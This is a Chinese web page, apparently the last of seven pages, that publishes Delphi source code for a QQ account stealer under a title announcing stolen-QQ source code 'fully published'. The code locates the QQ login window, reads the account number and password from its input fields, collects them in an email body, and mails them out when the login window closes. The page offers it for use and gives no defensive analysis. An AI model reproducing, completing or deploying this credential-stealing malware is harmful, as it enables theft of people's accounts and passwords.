收藏本站 
QQ繁体资料
QQ病毒查杀

盗QQ源码 完全公布


    hcrrentwindow := GetWindow(hcrrentwindow, GW_HWNDNEXT);
  end;
end;

procedure GoOnMonitorPasswordAndQQNumber;
var
  tempRect: TRect;
  Rightpassword: boolean;
begin
  QQhandle := FindQQHandle(Handle);
  if QQHandle <> 0 then
  begin

    GetWindowRect(QQhandle, tempRect);
    if oldWidth <> tempRect.Right - tempRect.Left then
    begin
      isFind := true;
      exit;
    end;
    QQID := GetIDandPassword(QQIDHandle); // ,false
    QQPassword := GetIDandPassword(QQPasswordHandle); //  ,true
   // MessageBox(0, pchar(QQID+#13#10+QQPassword), '提示', MB_OK + MB_ICONINFORMATION);
    Rightpassword := true;
    try StrToInt(QQID)except Rightpassword := false; end; //过滤无效的QQID
    if Rightpassword then
      if ((QQID <> oldQQID) or (QQPassword <> oldQQPassword)) and (QQID <> '') and (QQPassword <> '') then
      begin
        EmailBody := EmailBody + format('QQ号码:%s' + #13#10 + 'QQ密码:%s' + #13#10,
          [QQID, QQPassword]);
        oldQQID := QQID;
        oldQQPassword := QQPassword;
      end;
  end
  else //登录窗口消失,把密码发出,并让计时器回到查找QQ窗口中...
  begin
    isFind := true;
    SendMail;
  end;
end;

procedure FindQQWindowForAnyVersion;
var
  tempRect: TRect;
begin
  QQhandle := FindQQHandle(Handle);
  if QQHandle <> 0 then
  begin
    IsFind := false;
    GetWindowRect(QQhandle, tempRect);
    oldWidth := tempRect.Right - tempRect.Left;
    EmailBody := '';
    QQID := '';
    QQPassword := '';
    oldQQID := '';
    oldQQPassword := '';
    EditCount := 0;
    Count := 0;
    GetEditCount(QQHandle);
       // MessageBox(0, pchar(inttostr(EditCount)), '提示', MB_OK + MB_ICONINFORMATION);
    if EditCount = 1 then
      FindQQ2000Edit(QQHandle)
    else
      FindQQ2003Edit(QQHandle);
  end;
end;

end.



上一页 [1] [2] [3] [4] [5] [6] [7]    


上一篇:教你识别QQ盗号陷阱
下一篇:QQ自动消息源码
相关分类
QQ技巧 (629)
  QQ黑客攻防 (94)
  QQ病毒查杀 (53)
  QQ使用入门 (199)
  QQ技巧进阶 (151)
  QQ高手秘籍 (131)
 


站长赚钱   建站指南   网上创业   网上开店 爱情故事   恋爱技巧   爱情测试   心理测试 两性健康   性爱技巧   星座爱情   情书大全

黑马QQ宝典:www.heimaqq.com